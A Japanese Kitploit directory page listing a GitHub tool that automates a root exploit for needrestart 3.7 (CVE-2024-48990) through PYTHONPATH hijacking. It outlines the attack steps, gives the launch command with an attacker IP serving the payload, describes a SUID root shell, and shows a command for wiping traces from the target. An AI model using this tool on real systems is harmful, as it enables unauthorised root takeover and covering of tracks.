Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-48990-Automatic-Exploit — CVE-2024-48990(needrestart v3.7)向けの自動化されたローカル権限昇格エクスプロイト。PYTHONPATH ハイジャックを利用して root アクセスを獲得します。 | Kitploit
ツール/GitHubGitHub/serner77/cve-2024-48990-automatic-exploit
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ペイロード開発
GitHubserner77/cve-2024-48990-automatic-exploit

CVE-2024-48990-Automatic-Exploit

CVE-2024-48990(needrestart v3.7)向けの自動化されたローカル権限昇格エクスプロイト。PYTHONPATH ハイジャックを利用して root アクセスを獲得します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
99ヶ月前未レビュー

CVE-2024-48990 PYTHONPATH ハイジャック - 権限昇格エクスプロイト

このツールは、needrestart バージョン 3.7 における権限昇格の脆弱性(CVE-2024-48990)の悪用を自動化します。
needrestart が Python プロセスをスキャンする際の PYTHONPATH 環境変数の安全でない使用を悪用して、root での実行を実現します。

概要

このエクスプロイトは以下の手順で動作します:

  1. インポート時にトリガーされる悪意のある共有オブジェクト(__init__.so)をコンパイルする。
  2. ローカル HTTP サーバー経由で .so を配信する。
  3. SSH でターゲットに接続し、悪意のある PYTHONPATH 環境を準備する。
  4. importlib を継続的にインポートする Python ベイトプロセスを起動する。
  5. needrestart を実行する。これにより改ざんされた PYTHONPATH が継承され、悪意のあるモジュールが読み込まれ、ペイロードが root として実行される。
  6. ペイロードが SUID バイナリ(/tmp/poc)を作成し、root シェルへのアクセスを可能にする。

使用方法

攻撃者マシンからエクスプロイトを実行します:

root@kitploit:~
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>

パラメータ:

  • --user ターゲット上の SSH ユーザー名
  • --host ターゲットの IP アドレス
  • --att-ip 攻撃者の IP(ペイロードのホスティングに使用)
  • --ssh-pass SSH パスワード(SSH キーを使用する場合は省略)
  • --http-port オプションの HTTP ポート(デフォルト: 8000)

CVE

  • CVE ID: CVE-2024-48990
  • 影響を受けるソフトウェア: needrestart バージョン 3.7
  • 脆弱性の種類: 安全でない環境変数の処理
  • 影響: ローカルでの root への権限昇格

クリーンアップ

ターゲットからエクスプロイトの痕跡を削除するには:

root@kitploit:~
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh

要件

攻撃者マシン:

  • Python 3
  • pexpect (pip3 install pexpect)
  • gcc(ペイロードのコンパイル用)
  • ターゲットへの SSH アクセスが可能であること
  • python3 -m http.server(スクリプトによって自動起動される)

ターゲットマシン:

  • 脆弱なバージョンの needrestart(v3.7)
  • /usr/sbin/needrestart に対する sudo NOPASSWD 権限を持つ非 root ユーザー
  • Python 3 と curl がインストールされていること

免責事項

このツールは、教育目的および許可を得たセキュリティテスト専用に提供されています。 所有していないシステムや明示的な許可がないシステムで使用しないでください。

ツールをダウンロード